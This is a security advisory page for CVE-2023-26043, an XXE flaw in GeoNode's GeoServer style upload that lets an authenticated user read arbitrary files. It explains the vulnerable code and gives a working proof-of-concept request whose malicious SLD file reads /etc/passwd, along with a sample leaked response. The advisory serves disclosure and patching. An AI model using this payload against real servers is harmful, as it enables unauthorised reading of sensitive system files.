Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1tY21jLWM1OW0tcHFxOM4AA_D1
GeoServer style upload functionality vulnerable to XML External Entity (XXE) injection
Summary
GeoNode is vulnerable to an XML External Entity (XXE) injection in the style upload functionality of GeoServer leading to Arbitrary File Read.
Details
GeoNode's GeoServer has the ability to upload new styles for datasets through the dataset_style_upload
view.
# https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/views.py#L158-L159
@login_required
def dataset_style_upload(request, layername):
def respond(*args, **kw):
kw['content_type'] = 'text/html'
return json_response(*args, **kw)
...
sld = request.FILES['sld'].read() # 1
sld_name = None
try:
# Check SLD is valid
...
sld_name = extract_name_from_sld(gs_catalog, sld, sld_file=request.FILES['sld']) # 2
except Exception as e:
respond(errors=f"The uploaded SLD file is not valid XML: {e}")
name = data.get('name') or sld_name
set_dataset_style(layer, data.get('title') or name, sld)
return respond(
body={
'success': True,
'style': data.get('title') or name, # 3
'updated': data['update']})
dataset_style_upload
gets a user-provided file (1
), pass it to extract_name_from_sld
to extract an element from it (2
) and return the former in the response (3
).
# https://github.dev/GeoNode/geonode/blob/99b0557da5c7db23c72ad39e466b88fe43edf82d/geonode/geoserver/helpers.py#L233-L234
def extract_name_from_sld(gs_catalog, sld, sld_file=None):
try:
if sld:
if isfile(sld):
with open(sld, "rb") as sld_file:
sld = sld_file.read() # 1
if isinstance(sld, str):
sld = sld.encode('utf-8')
dom = etree.XML(sld) # 2
...
named_dataset = dom.findall(
"{http://www.opengis.net/sld}NamedLayer")
el = None
if named_dataset and len(named_dataset) > 0:
user_style = named_dataset[0].findall("{http://www.opengis.net/sld}UserStyle")
if user_style and len(user_style) > 0:
el = user_style[0].findall("{http://www.opengis.net/sld}Name") # 3
...
return el[0].text # 4
extract_name_from_sld
uses sld
(which is a path to the provided file), reads it (1
) and parses it with etree.XML
in 2
. Since the former uses a default XMLParser, the parsing gets done with the resolve_entities
flag set to True
. Therefore, dom
handles the parsed XML containing the resolved entity (2
), gets NamedLayer.UserStyle.Name
in 3
and returns the resolved content in 4
.
PoC
- Create a guest/non-privileged account and log in.
- Upload a dataset through
/catalogue/#/upload/dataset
whose name we will be referencing as<DATASET_NAME>
. - Send the following request that will try to upload a new style for the dataset. The response will be returning the resolved entity with the contents of
/etc/passwd
:
POST /gs/geonode:<DATASET_NAME>/style/upload HTTP/1.1
Host: localhost
Cookie: django_language=en-us; csrftoken=<CSRF-TOKEN>; sessionid=<SESSION-COOKIE>
X-Csrftoken: <CSRF-TOKEN>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfoo
Content-Length: 485
------WebKitFormBoundaryfoo
Content-Disposition: form-data; name="layerid"
1
------WebKitFormBoundaryfoo
Content-Disposition: form-data; name="sld"; filename="foo.sld"
Content-Type: application/octet-stream
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE foo [ <!ENTITY ent SYSTEM "/etc/passwd" > ]>
<foo xmlns="http://www.opengis.net/sld">
<NamedLayer>
<UserStyle>
<Name>&ent;</Name>
</UserStyle>
</NamedLayer>
</foo>
------WebKitFormBoundaryfoo--
Sample response:
HTTP/1.1 200 OK
Server: nginx/1.23.2
...
{"success": true, "style": "root:x:0:0:root:/root:/bin/bash...", "updated": false}
Impact
This issue may lead to authenticated Arbitrary File Read
.
JSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1tY21jLWM1OW0tcHFxOM4AA_D1
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 3 months ago
Updated: 5 days ago
CVSS Score: 6.5
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
Identifiers: GHSA-mcmc-c59m-pqq8, CVE-2023-26043
References:
- https://github.com/GeoNode/geonode/security/advisories/GHSA-mcmc-c59m-pqq8
- https://nvd.nist.gov/vuln/detail/CVE-2023-26043
- https://github.com/GeoNode/geonode/commit/2fdfe919f299b21f1609bf898f9dcfde58770ac0
- https://github.com/pypa/advisory-database/tree/main/vulns/geonode/PYSEC-2023-15.yaml
- https://github.com/advisories/GHSA-mcmc-c59m-pqq8
Blast Radius: 9.0
Affected Packages
pypi:GeoNode
Dependent packages: 0Dependent repositories: 24
Downloads: 6,430 last month
Affected Version Ranges: >= 0, < 4.0.3
Fixed in: 4.0.3
All affected versions: 2.0.1, 2.4.1, 2.5.1, 2.5.2, 2.5.3, 2.5.4, 2.5.5, 2.5.6, 2.5.7, 2.5.9, 2.5.10, 2.5.12, 2.5.13, 2.5.14, 2.5.15, 2.6.1, 2.6.2, 2.6.3, 2.8.1, 2.10.1, 2.10.2, 2.10.3, 2.10.4, 3.0.0, 3.1.0, 3.1.1, 3.2.0, 3.2.1, 3.2.2, 3.2.3, 3.2.4, 3.3.0, 3.3.1, 3.3.2, 3.3.3, 4.0.0, 4.0.1, 4.0.2
All unaffected versions: 4.0.3, 4.1.0, 4.1.1, 4.1.2, 4.1.3, 4.1.4, 4.1.5, 4.2.0, 4.2.1, 4.2.2, 4.2.3, 4.2.4, 4.2.5, 4.3.0, 4.3.1, 4.4.0, 4.4.1